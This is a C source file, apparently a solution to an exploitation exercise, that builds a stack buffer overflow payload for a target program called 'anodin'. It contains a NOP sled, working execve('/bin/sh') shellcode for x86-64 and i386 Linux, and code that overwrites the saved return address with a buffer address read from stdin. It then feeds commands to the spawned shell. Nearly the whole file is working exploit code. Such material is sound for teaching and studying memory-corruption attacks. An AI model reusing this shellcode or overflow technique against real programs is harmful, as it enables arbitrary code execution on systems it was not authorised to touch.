#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*
 * Payload buffer that main() writes to stdout for the vulnerable target.
 *
 * Layout: a 16-byte nop sled, then a self-contained
 * execve("/bin/sh", {"/bin/sh", NULL}, {NULL}) stub chosen at compile time
 * for the host ABI.  The remainder of the 1024 bytes is zero-initialised;
 * main() later stores copies of the target buffer address from byte offset
 * 64 onward so that the overwritten saved return address points back into
 * the sled.
 *
 * The stub obtains the address of "/bin/sh" position-independently with a
 * call/pop pair.  It contains NUL bytes (the call rel32, the mov imm32, the
 * string terminator, push 0), so it only survives a copy path that does not
 * stop at NUL (read()/fread/fgets into a buffer) -- a strcpy-style copy in
 * the target would truncate it.
 */
unsigned char exploit[1024] = {
    /* nop sled: slack for an imprecise buffer address */
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,

#ifdef __x86_64__
    /* x86-64 Linux: execve is syscall 59, arguments in rdi/rsi/rdx */
    0xe8, 0x08, 0x00, 0x00, 0x00,                   /* call +8     ; pushes the address of the string below and skips it */
    0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, /* "/bin/sh\0" */
    0x5f,                                           /* pop rdi     ; rdi = filename */
    0x48, 0xc7, 0xc0, 0x3b, 0x00, 0x00, 0x00,       /* mov rax, 59 ; __NR_execve */
    0x6a, 0x00,                                     /* push 0      ; NULL terminator shared by argv and envp */
    0x48, 0x89, 0xe2,                               /* mov rdx, rsp; envp = {NULL} */
    0x57,                                           /* push rdi    ; argv[0] = filename */
    0x48, 0x89, 0xe6,                               /* mov rsi, rsp; argv = {filename, NULL} */
    0x0f, 0x05,                                     /* syscall */
#else
    /* i386 Linux: execve is syscall 11, arguments in ebx/ecx/edx */
    0xe8, 0x08, 0x00, 0x00, 0x00,                   /* call +8     ; pushes the address of the string below and skips it */
    0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, /* "/bin/sh\0" */
    0x5b,                                           /* pop ebx     ; ebx = filename */
    0xb8, 0x0b, 0x00, 0x00, 0x00,                   /* mov eax, 11 ; __NR_execve */
    0x6a, 0x00,                                     /* push 0      ; NULL terminator shared by argv and envp */
    0x89, 0xe2,                                     /* mov edx, esp; envp = {NULL} */
    0x53,                                           /* push ebx    ; argv[0] = filename */
    0x89, 0xe1,                                     /* mov ecx, esp; argv = {filename, NULL} */
    0xcd, 0x80,                                     /* int 0x80 */
#endif
};
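/*
 * Entry point: reads the address of the target's stack buffer from stdin,
 * patches that address into the payload and streams the payload to stdout.
 *
 * Usage (the target program is referred to as "anodin" in the prompt; it is
 * not part of this file): run the target once to learn the buffer address it
 * prints, then pipe this program's stdout into the target and type that
 * address on stdin.  The address must be in the form printed by printf("%p")
 * on the same platform, which is what scanf("%p") accepts.
 *
 * After the 1024-byte payload, 8192 newlines are written, followed by two
 * shell commands that the spawned /bin/sh is expected to execute.
 *
 * Returns 0 on success, 1 if no address could be parsed or the output could
 * not be written.
 */
int main(void) {
    void *ptr;

    fprintf(stderr, "Type the buf address printed by anodin\n");
    if (scanf("%p", &ptr) != 1) {
        /* Without a valid address the payload would carry an uninitialised pointer. */
        fprintf(stderr, "Could not parse a %%p-style address from stdin\n");
        return 1;
    }

    /* A bit of margin: aim a few bytes into the nop sled rather than at its
     * very first byte.  Arithmetic on unsigned char* instead of void* keeps
     * this standard C (void* arithmetic is a GNU extension). */
    ptr = (unsigned char *)ptr + 8;

    /* Overwrite the saved return address: 8 consecutive pointer-sized slots
     * starting at byte 64 of the payload receive the target address, so the
     * exploit works for a range of saved-return-address offsets.  memcpy
     * avoids the aliasing / misaligned write of storing through a void**
     * into the byte array.  8 * sizeof(void *) + 64 is well below 1024. */
    for (size_t i = 0; i < 8; i++)
        memcpy(&exploit[64 + i * sizeof(void *)], &ptr, sizeof ptr);

    /* Raw payload first, including NUL bytes and the pointer bytes: stdout
     * must be a pipe or file, not a terminal. */
    if (fwrite(exploit, 1, sizeof exploit, stdout) != sizeof exploit)
        return 1;

    /* Padding newlines after the payload. */
    for (int i = 0; i < 8192; i++)
        putchar('\n');

    /* Commands for the shell that the shellcode spawns. */
    printf("touch /tmp/ahah\n");
    printf("echo \"I created file\" /tmp/ahah \\!\n");

    if (fflush(stdout) != 0)
        return 1;

    return 0;
}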